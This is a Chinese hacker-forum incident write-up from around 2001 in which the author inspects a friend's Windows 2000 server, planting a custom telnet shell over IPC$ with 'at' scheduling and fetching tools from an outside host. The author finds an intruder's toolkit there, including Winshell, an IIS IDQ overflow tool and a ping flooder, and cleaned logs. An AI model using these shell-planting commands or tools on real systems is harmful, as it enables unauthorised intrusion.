CoolWolF

前天在网易聊天室里碰上一个很谈得来的朋友，他告诉我他准备做一个大型的音乐网站，服务器已经架设好一段时间了，不过还没有正式运作，网页也没有上传。想让我帮忙看看有什么安全问题，并给了我一个administrator权限的账号。在检测的过程中，我发现了一些很有意思的东西，也许能给想成为黑客的朋友一些启发，于是就写了这篇文章，希望对你能有帮助。
另外说明一点：我反对恶意入侵任何一台服务器，哪怕是日本、台湾、美国的，因为网络中有一套自己的游戏规则，恶意破坏它的人肯定会得到应有的制裁。希望大家能明白这个道理。
本文可以在网络媒体中任意传播，但请保留上面的话，谢谢。


朋友的的服务器IP地址为11.11.11.11，操作系统是Windowns 2000 Server
SP2。我先用流光和X-Scan-v1.0(beta)各扫了一次，除了允许IPC空连接以外，似乎没有什么大的问题。这IPC空连接可是NT安全问题的万恶之源阿，呵呵~
一定要告诉他修改注册表。
然后我用Pslist看了一下进程：
D:\hack>pslist \\11.11.11.11 -u webmaster

PsList v1.12 - Process Information Lister
Copyright (C) 1999-2000 Mark Russinovich
Systems Internals - http://www.sysinternals.com

Password:
Process information for 11.11.11.11:

Name Pid Pri Thd Hnd Mem User Time Kernel Time Elapsed Time
Idle 0 0 1 0 16 0:00:00.000 29:17:24.640 30:00:22.128
System 8 8 38 307 284 0:00:00.000 0:01:12.265 30:00:22.128
smss 160 11 6 33 540 0:00:00.015 0:00:00.281 30:00:22.128
csrss 184 13 12 600 2632 0:00:00.281 0:00:31.921 30:00:17.034
winlogon 204 13 18 379 5016 0:00:19.296 0:00:18.000 30:00:15.315
services 232 9 40 729 8400 0:00:04.109 0:00:08.765 30:00:14.253
lsass 244 9 40 811 33872 0:01:23.593 0:00:51.609 30:00:14.222
svchost 456 8 8 315 3748 0:00:01.031 0:00:00.750 30:00:10.472
spoolsv 480 8 10 167 4628 0:00:00.093 0:00:00.265 30:00:10.237
msdtc 132 8 20 179 5116 0:00:00.046 0:00:00.312 29:54:29.925
awhost32 760 8 13 220 5172 0:00:00.062 0:00:00.421 29:54:29.222
defwatch 780 8 3 35 1092 0:00:00.015 0:00:00.093 29:54:28.519
Dfssvc 796 8 6 139 3500 0:00:00.812 0:00:01.796 29:54:28.456
tcpsvcs 812 8 15 265 6316 0:00:17.062 0:00:25.031 29:54:28.425
svchost 836 8 25 838 8232 0:00:01.281 0:00:02.640 29:54:28.378
pds 876 8 6 136 2204 0:00:00.046 0:00:00.203 29:54:28.222
ismserv 940 8 13 344 3372 0:00:00.109 0:00:00.343 29:54:26.972
llssrv 968 9 12 178 3536 0:00:00.921 0:00:01.671 29:54:26.894
NISUM 1072 8 3 92 2580 0:00:00.859 0:00:00.546 29:54:26.534
rtvscan 1100 8 40 310 6336 0:08:52.937 0:15:15.750 29:54:26.487
NSCTOP 1116 8 23 209 3780 0:00:00.046 0:00:00.406 29:54:25.690
ntfrs 1216 8 18 543 776 0:00:11.890 0:00:19.812 29:54:25.440
regsvc 1252 8 4 101 1376 0:00:00.125 0:00:00.218 29:54:24.940
locator 1264 8 3 69 1832 0:00:00.015 0:00:00.203 29:54:24.831
MSTask 1284 8 8 132 2928 0:00:00.078 0:00:00.296 29:54:24.690
svchost 1404 8 11 189 2096 0:00:00.062 0:00:00.296 29:54:23.987
WinMgmt 1444 8 3 98 176 0:00:27.187 0:00:03.390 29:54:23.784
dns 1484 8 13 183 2960 0:00:00.171 0:00:00.593 29:54:23.425
hndlrsvc 1516 8 4 62 3008 0:00:00.031 0:00:00.343 29:54:23.003
MsgSys 1572 8 4 147 2996 0:00:00.031 0:00:00.265 29:54:22.581
iao 1680 8 7 132 2356 0:00:00.031 0:00:00.375 29:54:19.847
xfr 1700 8 4 50 1768 0:00:00.015 0:00:00.218 29:54:19.612
dllhost 2532 8 11 189 3808 0:00:00.234 0:00:00.468 29:29:50.831
Explorer 2628 8 11 383 3184 0:00:05.015 0:00:14.796 28:45:01.175
vptray 1336 8 3 114 2884 0:00:00.046 0:00:00.265 28:45:00.612
internat 2624 8 1 31 1424 0:00:00.046 0:00:00.171 28:45:00.112
conime 2776 8 1 19 1032 0:00:00.031 0:00:00.062 28:41:11.128
inetinfo 2660 8 26 642 5992 0:00:26.078 0:00:50.109 27:03:43.534
snmp 2004 8 9 271 3608 0:00:00.093 0:00:00.265 27:03:24.519
winlog 904 8 4 73 1140 0:00:00.015 0:00:00.015 16:55:12.736

D:\hack>
似乎都是正常的系统进程，但请注意红色的一行，我的印象中似乎没有一个叫做Winlog的系统服务阿，而且启动时间和其他系统服务明显不一样。为了保险，我还是决定上去看看。
C:\>net use \\11.11.11.11\ipc$ "****" /user:webmaster
命令成功完成。
然后用Windows 2000的事件察看器连过去：(图)


靠！怎么只有我刚才的一个记录？很明显，有人故意删除了系统安全日志。嘿嘿，这下子有意思了！
既然能删除安全日志，那么肯定是Administrator组的权限，那么我就先来看看：
D:\hack>letmein \\11.11.11.11 -admin -d
stating connecting to server ...
Server local time is: 2001-7-21 21:20:11

Start get all administrators from server...
--------------------------------
Group=administrators
--------------------------------
num1 = MUSIC\Administrator () //管理员账号，据我所知密码是8位数
num2 = MUSIC\wangzhi () //我朋友的账号，密码同上
num3 = MUSIC\webmaster () //我正在使用的账号，刚刚建立几个小时
num4 = MUSIC\Xon () //有点可疑哦，因为朋友告诉我只有他一个人管理这台服务器
--------------------------
Total = 4
--------------------------

D:\hack>
算了，我还是上去看看吧。
D:\hack>copy ccmd.exe \\11.11.11.11\admin$\system32 //我自己改的一个telnet服务器
已复制 1 个文件。
D:\hack>copy Wget.exe \\11.11.11.11\admin$\system32 //一个命令行下的下载软件，很方便的
已复制 1 个文件。
D:\hack>net time \\11.11.11.11
\\11.11.11.11 的当前时间是 2001/7/21 下午 09:23
命令成功完成。
D:\hack>at \\11.11.11.11 21:24 ccmd.exe 7878 7878
新加了一项作业，其作业 ID = 1
D:\hack>telnet 11.11.11.11 7878
Welcome to CoolWolF's hack world!
please enter your password:

Microsoft Windows 2000 [Version5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32>
哈哈，进来了！
嗯，先看看有没有什么可疑的端口：
C:\win2000\system32>down www.hack.com/fport.exe
down www.hack.com/fport.exe
--22:07:17-- http://www.hack.com:80/fport.exe
=> `fport.exe'
Connecting to www.hack.com:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 126,976 [application/octet-stream]

0K -> .......... .......... .......... [100%]

22:07:30 (14.21 MB/s) - `fport.exe' saved [126,976/126,976]


C:\win2000\system32>
开工！
C:\win2000\system32>
C:\win2000\system32>fport
fport
FPort v1.33 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.
http://www.foundstone.com

Pid Process Port Proto Path
2660 inetinfo -> 25 TCP C:\WINNT\System32\inetsrv\inetinfo.exe
1484 dns -> 53 TCP C:\WINNT\System32\dns.exe
2660 inetinfo -> 80 TCP C:\WINNT\System32\inetsrv\inetinfo.exe
244 lsass -> 88 TCP C:\WINNT\system32\lsass.exe
456 svchost -> 135 TCP C:\WINNT\system32\svchost.exe
8 System -> 139 TCP
244 lsass -> 389 TCP C:\WINNT\system32\lsass.exe
2660 inetinfo -> 443 TCP C:\WINNT\System32\inetsrv\inetinfo.exe
8 System -> 445 TCP
244 lsass -> 464 TCP C:\WINNT\system32\lsass.exe
456 svchost -> 593 TCP C:\WINNT\system32\svchost.exe
244 lsass -> 636 TCP C:\WINNT\system32\lsass.exe
244 lsass -> 1026 TCP C:\WINNT\system32\lsass.exe
244 lsass -> 1029 TCP C:\WINNT\system32\lsass.exe
132 msdtc -> 1090 TCP C:\WINNT\System32\msdtc.exe
940 ismserv -> 3002 TCP C:\WINNT\System32\ismserv.exe
940 ismserv -> 3003 TCP C:\WINNT\System32\ismserv.exe
940 ismserv -> 3004 TCP C:\WINNT\System32\ismserv.exe
940 ismserv -> 3005 TCP C:\WINNT\System32\ismserv.exe
1284 MSTask -> 3009 TCP C:\WINNT\system32\MSTask.exe
232 services -> 3010 TCP C:\WINNT\system32\services.exe
812 tcpsvcs -> 3016 TCP C:\WINNT\System32\tcpsvcs.exe
1484 dns -> 3017 TCP C:\WINNT\System32\dns.exe
1216 ntfrs -> 3019 TCP C:\WINNT\system32\ntfrs.exe
8 System -> 3021 TCP
1216 ntfrs -> 3060 TCP C:\WINNT\system32\ntfrs.exe
244 lsass -> 3268 TCP C:\WINNT\system32\lsass.exe
244 lsass -> 3269 TCP C:\WINNT\system32\lsass.exe
132 msdtc -> 3372 TCP C:\WINNT\System32\msdtc.exe
2660 inetinfo -> 3998 TCP C:\WINNT\System32\inetsrv\inetinfo.exe
244 lsass -> 5879 TCP C:\WINNT\system32\lsass.exe
2660 inetinfo -> 6246 TCP C:\WINNT\System32\inetsrv\inetinfo.exe
836 svchost -> 6252 TCP C:\WINNT\System32\svchost.exe
836 svchost -> 6253 TCP C:\WINNT\System32\svchost.exe
836 svchost -> 6254 TCP C:\WINNT\System32\svchost.exe
836 svchost -> 6288 TCP C:\WINNT\System32\svchost.exe
875 ccmd -> 7878 TCP C:\WINNT\System32\ccmd.exe
904 winlog -> 8110 TCP D:\win2000\system\winlog.exe
1484 dns -> 11206 TCP C:\WINNT\System32\dns.exe
1216 ntfrs -> 20913 TCP C:\WINNT\system32\ntfrs.exe
232 services -> 23599 TCP C:\WINNT\system32\services.exe
812 tcpsvcs -> 24003 TCP C:\WINNT\System32\tcpsvcs.exe
796 Dfssvc -> 24210 TCP C:\WINNT\system32\Dfssvc.exe

1484 dns -> 53 UDP C:\WINNT\System32\dns.exe
812 tcpsvcs -> 67 UDP C:\WINNT\System32\tcpsvcs.exe
812 tcpsvcs -> 68 UDP C:\WINNT\System32\tcpsvcs.exe
244 lsass -> 88 UDP C:\WINNT\system32\lsass.exe
232 services -> 123 UDP C:\WINNT\system32\services.exe
456 svchost -> 135 UDP C:\WINNT\system32\svchost.exe
8 System -> 137 UDP
8 System -> 138 UDP
2004 snmp -> 161 UDP C:\WINNT\System32\snmp.exe
244 lsass -> 389 UDP C:\WINNT\system32\lsass.exe
8 System -> 445 UDP
244 lsass -> 464 UDP C:\WINNT\system32\lsass.exe
244 lsass -> 500 UDP C:\WINNT\system32\lsass.exe
244 lsass -> 1028 UDP C:\WINNT\system32\lsass.exe
796 Dfssvc -> 1091 UDP C:\WINNT\system32\Dfssvc.exe
204 winlogon -> 1098 UDP \??\C:\WINNT\system32\winlogon.exe
812 tcpsvcs -> 1101 UDP C:\WINNT\System32\tcpsvcs.exe
812 tcpsvcs -> 2535 UDP C:\WINNT\System32\tcpsvcs.exe
1100 rtvscan -> 2967 UDP C:\Program Files\NAV\rtvscan.exe
940 ismserv -> 3001 UDP C:\WINNT\System32\ismserv.exe
1116 NSCTOP -> 3006 UDP C:\Program Files\SSC\NSCTOP.EXE
1116 NSCTOP -> 3007 UDP C:\Program Files\SSC\NSCTOP.EXE
1484 dns -> 3012 UDP C:\WINNT\System32\dns.exe
1484 dns -> 3013 UDP C:\WINNT\System32\dns.exe
1484 dns -> 3014 UDP C:\WINNT\System32\dns.exe
1216 ntfrs -> 3026 UDP C:\WINNT\system32\ntfrs.exe
232 services -> 3028 UDP C:\WINNT\system32\services.exe
836 svchost -> 3408 UDP C:\WINNT\System32\svchost.exe
2660 inetinfo -> 3456 UDP C:\WINNT\System32\inetsrv\inetinfo.exe
968 llssrv -> 4060 UDP C:\WINNT\System32\llssrv.exe
232 services -> 6099 UDP C:\WINNT\system32\services.exe
2660 inetinfo -> 6249 UDP C:\WINNT\System32\inetsrv\inetinfo.exe
480 spoolsv -> 6863 UDP C:\WINNT\system32\spoolsv.exe
232 services -> 24220 UDP C:\WINNT\system32\services.exe
1572 MsgSys -> 38037 UDP C:\WINNT\system32\MsgSys.EXE
876 pds -> 38293 UDP C:\WINNT\system32\cba\pds.exe

C:\win2000\system32>

请注意我用红色标出的两行，CCMD是我现在正在使用的Shell，刚才发现的那个不明进程Winlog打开了8110端口，而它所在的目录是D:\win2000\system\，看起来很像是一个系统关键进程，我们就来看看：
D:\win2000>dir
dir
驱动器 D 中的卷是 新加卷
卷的序列号是 28F8-B814

D:\win2000 的目录

2001-06-03 17:43 <DIR> .
2001-06-03 17:43 <DIR> ..
2001-06-03 17:43 <DIR> CLIENTS
2001-06-03 17:43 <DIR> BOOTDISK
2001-06-03 17:43 <DIR> I386
2001-06-03 17:46 <DIR> PRINTERS
2001-06-03 17:46 <DIR> SETUPTXT
2001-06-03 17:46 <DIR> SUPPORT
2001-06-03 17:46 <DIR> valuesADD
2000-01-10 20:00 45 AUTORUN.INF
2000-01-10 20:00 304,624 BOOTFONT.BIN
2000-01-10 20:00 5 CDROM_IS.5
2000-01-10 20:00 5 CDROM_NT.5
2000-01-10 20:00 12,354 READ1ST.TXT
2000-01-10 20:00 465,408 README.DOC
2000-01-10 20:00 267,536 SETUP.EXE
2001-06-04 17:37 <DIR> SP1
2001-06-27 16:03 <DIR> sp2
2001-07-06 00:05 <DIR> system
7 个文件 1,049,977 字节
12 个目录 10,933,551,104 可用字节

D:\win2000>
哦？看来这个目录是Win2000安装盘在硬盘上的备份，是绝对没有程序会在这里运行的，那么System目录下面是……
D:\win2000>cd system
cd system

D:\win2000\system>
D:\win2000\system>dir
dir
驱动器 D 中的卷是 新加卷
卷的序列号是 28F8-B814

D:\win2000\system 的目录

2001-07-06 00:05 <DIR> .
2001-07-06 00:05 <DIR> ..
2001-06-17 04:27 14,898 1.dic
2001-06-09 01:02 40,960 1.exe
2001-05-30 03:51 23,040 cc.exe
2001-05-11 00:07 80,896 down.exe
2001-05-30 04:02 126,976 fport.exe
2001-06-17 04:25 33,280 ipccrack.exe
2000-02-24 02:52 26,624 pskill.EXE
2001-06-18 22:57 40,960 letmein.exe
2001-06-13 23:09 131,072 log.exe
2001-06-15 05:17 110,592 ntlm.exe
2001-06-15 06:00 19,968 passdump.exe
2001-05-30 03:42 49,152 pslist.exe
2001-07-05 15:20 45,056 psloggedon.exe
2001-06-12 00:16 40,960 RED.EXE
2001-06-14 14:58 9,737,626 china.rar
2001-07-14 16:00 217,185 mscan.exe
2001-07-15 00:04 16,384 idq.exe
2001-07-15 00:04 36,864 iisx.exe
2001-07-18 23:05 5,154,342 tyshop.zip
2001-05-10 12:00 4,640 winlog.exe
20 个文件 32,320,012 字节
2 个目录 10,933,551,104 可用字节

D:\win2000\system>
哇！！黑客！！！！！
从文件的大小来判断，Winlog.exe应该是孤独剑客的Winshell，然后我telnet到8110端口，也证明了这一点。还有PS工具包里的几个软件、ipccrack、letmein、小榕的ntlm、Ison的iisx等工具。除此之外还有几个不明的软件。
呵呵，挺全面的阿。我们来看看其他几个是甚么软件：
D:\win2000\system> idq
运行参数: 操作系统类型 目的地址 web端口 溢出端口

支持的操作系统 类型: ----
0 -- IIS5中文Win2k Sp0
1 -- IIS5中文Win2k Sp1
2 -- IIS5中文Win2k Sp2
3 -- --not support -- IIS5 English Win2k Sp0
4 -- IIS5 English Win2k Sp1
5 -- --not support -- IIS5 English Win2k Sp2
6 -- --not support -- IIS5 Japanese Win2k Sp0
7 -- IIS5 Japanese Win2k Sp1
8 -- --not support -- IIS5 Japanese Win2k Sp2

IIS5 IDQ Overflow. by snake. 2000/07

D:\win2000\system>
D:\win2000\system>1.exe
FakePing by Shotgun
This program can do Ping-Flooding from a FakeIP
Using a BroadCast IP as the FakeIP will enhance the effect
Email:
Shotgun@Xici.Net
HomePage:
http://It.Xici.Net
http://www.Patching.Net
USAGE:
FakePing.exe FakeSourceIp DestinationIp [PacketSize]
Example:
FakePing.exe 192.168.15.23 192.168.15.255
FakePing.exe 192.168.15.23 192.168.15.200 6400
D:\win2000\system>
D:\win2000\system>mscan

__________Thread Port & Hole Scanner Ver 1.0 by Leaf________
Email: whleaf@21cn.com
MSCAN FOR WIN32 内部测试版，由红色五月小组移植。主页 www.cnredmay.net
请勿外传，违者纪律处理。有问题请发站长工作室。或联系cnredmay@cnredmay.com
征集工作室名称，请发站长工作室。或联系cnredmay@cnredmay.com
This program can run under Windows :)))
______Can scan ClASS C ,Stronger than twwwscan and faster then Nmap_______

usage: mscan [PORT] startIP [EndIP]

If want to scan the IIS hole, set PORT 80
Example:
mscan 80 192.168.1.1 192.168.1.255
If want to list the FTP Head, set PORT 21
Example:
mscan 21 192.168.1.1 192.168.1.255
If want to list all the host that open one port, set PORT specical
Example:
mscan 3389 192.168.1.1 192.168.1.255
If want to scan one host IIS hole, use like that:
mscan 80 192.168.1.18
If want to scan all the port one host ,use like that:
mscan 192.168.1.28
D:\win2000\system>
D:\win2000\system>down.exe
down: missing URL
Usage: down [OPTION]... [URL]...

Try `down --help' for more options.
D:\win2000\system>
D:\win2000\system>
一个和我一样喜欢用Wget的家伙，而且有一个MSCAN的内部测试版，不会是红色五月的人吧？嘻嘻~~
还有两个比较大的压缩文件，我把相对比较小的tyshop.zip复制到C:\inetpub\wwwroot，下载后发现是一个商业网站的ASP源代码，那么估计china.rar就是前段时间地下流传的中华网交友系统源代码，看来这位黑客兄弟和我的业余爱好差不多，哈哈。
嗯，既然他需要从服务器上下载东西到本地，那还是要去看看WEB日志，说不定能找到什么蛛丝马迹：
C:\WINNT\system32\LogFiles\W3SVC1>dir
dir
驱动器 C 中的卷是 Dell Server
卷的序列号是 F4EE-CE39

C:\WINNT\system32\LogFiles\W3SVC1 的目录

2001-07-21 14:40 <DIR> .
2001-07-21 14:40 <DIR> ..
2001-06-14 04:49 418 ex010613.log
2001-06-15 03:09 2,325 ex010614.log
2001-06-16 04:24 1,123 ex010615.log
2001-06-17 06:26 1,081 ex010616.log
2001-06-18 05:31 627 ex010617.log
2001-06-19 01:08 700 ex010618.log
2001-06-20 08:00 2,917 ex010619.log
2001-06-21 08:00 3,298 ex010620.log
2001-06-21 20:48 1,300 ex010621.log
2001-06-23 02:53 4,445 ex010622.log
2001-06-24 05:07 3,467 ex010623.log
2001-06-25 04:48 836 ex010624.log
2001-06-26 01:02 765 ex010625.log
2001-06-27 01:45 1,120 ex010626.log
2001-06-28 08:00 57,661 ex010627.log
2001-06-29 02:33 797 ex010628.log
2001-06-30 04:47 1,541 ex010629.log
2001-07-01 08:00 1,005 ex010630.log
2001-07-02 08:00 4,334 ex010701.log
2001-07-03 00:15 970 ex010702.log
2001-07-03 18:05 334 ex010703.log
2001-07-05 02:43 1,339 ex010704.log
2001-07-05 23:54 52,208 ex010705.log
2001-07-07 22:59 0 ex010707.log
2001-07-08 22:45 0 ex010708.log
2001-07-10 08:00 587 ex010709.log
2001-07-11 08:00 28,235 ex010710.log
2001-07-12 08:00 1,204 ex010711.log
2001-07-13 04:07 3,201 ex010712.log
2001-07-14 01:33 1,027 ex010713.log
2001-07-15 03:36 1,045 ex010714.log
2001-07-17 08:00 2,532 ex010716.log
2001-07-18 02:09 543 ex010717.log
2001-07-19 02:54 838 ex010718.log
2001-07-21 01:11 2,556 ex010719.log
2001-07-21 01:39 544 ex010720.log
2001-07-22 03:53 1,910 ex010721.log
37 个文件 188,833 字节
2 个目录 1,112,424,448 可用字节

C:\WINNT\system32\LogFiles\W3SVC1>
C:\WINNT\system32\LogFiles\W3SVC1>
随便挑一个看看吧，反正他在这里安家的日子也不短了：
C:\WINNT\system32\LogFiles\W3SVC1>type ex010704.log
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-07-04 03:17:46
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-que
ry sc-status cs(User-Agent)
2001-07-04 03:17:46 192.18.2.10 - 192.18.2.1 80 GET /iisstart.asp - 200 Mozilla/
4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
2001-07-04 03:17:46 192.18.2.10 - 192.18.2.1 80 GET /pagerror.gif - 304 Mozilla/
4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
2001-07-04 06:49:45 202.104.240.118 – 11.11.11.11 80 GET /iisstart.asp - 200 Mo
zilla/4.0+(compatible;+MSIE+4.01;+Windows+98)
2001-07-04 12:05:36 61.144.143.131 - 11.11.11.11 80 GET /iisstart.asp - 200 Moz
illa/4.0+(compatible;+MSIE+4.01;+Windows+95)
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-07-04 13:38:28
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-que
ry sc-status cs(User-Agent)
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-07-04 15:57:08
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-que
ry sc-status cs(User-Agent)
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-07-04 18:00:59
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-que
ry sc-status cs(User-Agent)

C:\WINNT\system32\LogFiles\W3SVC1>
哎，很明显是清理过的，看来这位仁兄的手脚还挺干净。
然后我又看了比较大的几个日志文件，都是一些无聊的小朋友扫描留下的脚印，没什么价值。
这个时候朋友上QQ了，他告诉我没有一个叫做Xon的用户，还很紧张地问我是不是被黑了。呵呵~
然后我就把Xon这个用户给删除了，用Pskill结束了Winlog进程，删除D:win2000\system>下面的所有文件，然后写了一个文本文件，内容是：“朋友，我很欣赏你的技术，我的电子邮件地址是coolwolf@hackermail.com，有空的时候多交流。但是请不要在我朋友的服务器上养鸡。”
其实这种处理方法是最保守的一种，我完全可以不动他的任何东西，然后让朋友在服务器本地打开网络监视器，总是可以搞到他的IP的。然后就看你想怎么处理了，狠一点就报告公安局，温柔一点也可以查出来他的电话号码恐吓一番。哪怕他的手脚再干净，也不可能躲过的。这也就是我为什么反对入侵的道理，你永远不知道管理员的水平，也许他只是装傻，而背后在监视你的一切。
事情到这里本来应该结束了，但我还是没弄明白那位黑客朋友是怎么进入的，想了一下大约有三种可能：
1．通过IPC管道暴力破解。这种方法我觉得可能性不大，因为密码是8位数的字母+符号，如果真的爆破，我估计事件管理器早就报警了；
2．他是管理员的朋友，或者通过其他途径获得了管理员密码，然后添加了一个账号开始养鸡。这种方法纯属我一厢情愿的猜测，因为我实在懒得动脑子，哈哈；
3．他首先通过一些手段入侵了内网的主控服务器或者其他服务器，然后经由一系列的举动控制了整个内部网段。听起来有些高深，但这种情况我以前确实见过，所以可能性还是比较大的。
于是我决定对内网进行一下安全检测：
C:\WINNT\system32>net view
net view
服务器名称 注释
-------------------------------------------------------------------------------
\\521love
\\999china
\\aboutlist
\\alert
\\bbscool
\\Babel
\\bee
…………
实在是太多，就不写出来了，反正至少上百。这时候我兴趣全无，于是把大概的情况告诉了朋友，让他和主机托管单位联系。就此结束了这次不成功的安全检测。
虽然结束了，但是这位黑客朋友还是教会了我不少东西：首先他的工具包很合理，个头不大而功能齐全，除了扫描器稍弱（我可没有看不起红色五月小组的意思），其它都是相应领域中的佼佼者；其次就是很小心，日志清理的很好不说，而且这是我第一次见到有人在肉鸡上放psloggedon，观察管理员的动向和习惯，这是很重要的，但是往往被我们在NT平台下所忽略了；最后就是一种职业道德（？），在一台服务器上潜伏着这么久，没有添加或者删除任何一个服务，也没有修改页面或者做出什么对服务器有损害的事情（比如说经常有人喜欢在肉鸡上跑流影，这是一种非常消耗服务器资源和网络资源的行为），只是进行一些扫描和下载活动，不知道这算不算黑客精神，呵呵~~~~
　

主目录 分目录